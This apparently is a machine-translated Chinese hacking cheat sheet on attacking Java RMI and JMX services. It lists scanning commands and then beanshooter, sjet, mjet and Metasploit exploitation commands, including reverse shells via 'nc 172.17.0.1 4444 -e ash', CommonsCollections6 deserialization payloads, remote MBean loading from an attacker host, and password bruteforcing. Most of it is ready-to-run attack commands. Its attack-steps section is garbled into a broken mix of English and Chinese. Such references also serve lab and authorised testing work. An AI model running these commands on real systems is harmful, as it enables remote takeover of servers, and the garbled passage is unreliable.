Java RMI Java RMI(远程方法调用)是一个 Java API,它允许运行在某个 JVM(Java 虚拟机)中的对象调用运行在另一个 JVM 中的对象的方法,即使这两个 JVM 运行在不同的物理机器上。RMI 提供了一种基于 Java 的分布式计算机制。 概述 工具 检测 方法论 使用 beanshooter 实现 RCE 使用 sjet 或 mjet 实现 RCE 使用 Metasploit 实现 RCE 参考文献 工具 siberas/sjet - siberas JMX 漏洞利用工具包 mogwailabs/mjet - MOGWAI LABS JMX 漏洞利用工具包 qtc-de/remote-method-guesser - Java RMI 漏洞扫描器
Java RMI(远程方法调用)是一个 Java API,它允许运行在某个 JVM(Java 虚拟机)中的对象调用运行在另一个 JVM 中的对象的方法,即使这两个 JVM 运行在不同的物理机器上。RMI 提供了一种基于 Java 的分布式计算机制。
使用 nmap:
$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v 1089/tcp open java-rmi Java RMI | rmi-vuln-classloader: | VULNERABLE: | RMI registry default configuration remote code execution vulnerability | State: VULNERABLE | Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution. | rmi-dumpregistry: | jmxrmi | javax.management.remote.rmi.RMIServerImpl_Stub
使用 qtc-de/remote-method-guesser:
$ rmg scan 172.17.0.2 --ports 0-65535 [+] Scanning 6225 Ports on 172.17.0.2 for RMI services. [+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC) [+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC) [+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC) [+] [6234 / 6234] [#############################] 100% [+] Portscan finished. $ rmg enum 172.17.0.2 9010 [+] RMI registry bound names: [+] [+] - plain-server2 [+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711] [+] - legacy-service [+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class) [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309] [+] - plain-server [+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813] [...]
使用 rapid7/metasploit-framework:
use auxiliary/scanner/misc/java_rmi_server set RHOSTS <IPs> set RPORT <PORT> run
如果 Java 远程方法调用 (RMI) 服务配置不当,就会容易受到多种远程代码执行 (RCE) 攻击。其中一种方法是托管一个 MLet 文件,并让 JMX 服务从远程服务器加载 MBean,这可以通过 mjet 或 sjet 等工具来实现。remote-method-guesser 工具相对较新,它将 RMI 服务的枚举与已知攻击策略的概览结合在一起。
列出可用属性:beanshooter info 172.17.0.2 9010
Display value of an attribute: beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose
Set the value of an attribute: beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean
Bruteforce a password protected JMX service: beanshooter brute 172.17.0.2 1090
List registered MBeans: beanshooter list 172.17.0.2 9010
Deploy an MBean: beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000
Enumerate JMX endpoint: beanshooter enum 172.17.0.2 1090
Invoke method on a JMX endpoint: beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'
调用任意公共和静态 Java 方法:
beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")' beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
标准 MBean 执行:beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'
Deserialization attacks on a JMX endpoint: beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin
The attack involves the following steps:
javax.management.loading.MLet on the target server, using JMXgetMBeansFromURL 方法,将 Web 服务器 URL 作为参数传递。JMX 服务会连接到 HTTP 服务器并解析 MLet 文件。使用 siberas/sjet 或 mogwailabs/mjet 利用 JMX 漏洞
jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000 jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la" jython sjet.py TARGET_IP TARGET_PORT super_secret shell jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx" jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000 jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami" jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
use exploit/multi/misc/java_rmi_server set RHOSTS <IPs> set RPORT <PORT> # configure also the payload if needed run
免责声明:
本文件由基于人工智能的机器翻译服务翻译而成。尽管我们力求翻译准确,但请注意,自动翻译可能包含错误或不准确之处。应以原始语言版本的文件为准。对于关键信息,建议使用专业的人工翻译。对于因使用本翻译而产生的任何误解或误读,我们概不负责。